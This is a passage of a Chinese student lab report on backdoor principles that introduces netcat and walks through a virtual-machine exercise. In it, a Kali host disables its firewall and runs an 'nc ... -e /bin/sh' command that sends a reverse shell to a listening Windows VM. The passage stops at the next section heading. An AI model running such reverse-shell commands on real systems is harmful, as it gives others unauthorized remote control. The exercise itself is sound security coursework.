20175133 于沛辰 Exp2 后门原理与实践 0.基础知识 0.1 后门概念 后门就是不经过正常认证流程而访问系统的通道。 0.2 哪里有后门? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 狭义定义: 特指潜伏于操作系统中专门做后门的一个程序,“坏人”可以连接这个程序 远程执行各种指令。 概念和木马有重叠 0.3 常用后门工具:netcat 又名nc,ncat 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用 1.实验内容 1.1 Win获得Linux Shell 以下实践Windows基本Win7-64bit, Kali 2020-64bit. ·打开Windows监听 在虚拟机win7上调出命令指示符输入指令 ipconfig 查看地址 打开监听,输入指令 ncat.exe -l -p 5133 ·Linux反弹连接win 先输入指令 apt- get install ufw 安装,然后再输入指令 ufw disable 关闭kali防火墙 在kali的终端输入命令 nc 192.168 . 199.136 5133 -e /bin/sh windows下获得一个linux shell,可运行任何指令,如ls ·Linux获得Win Shell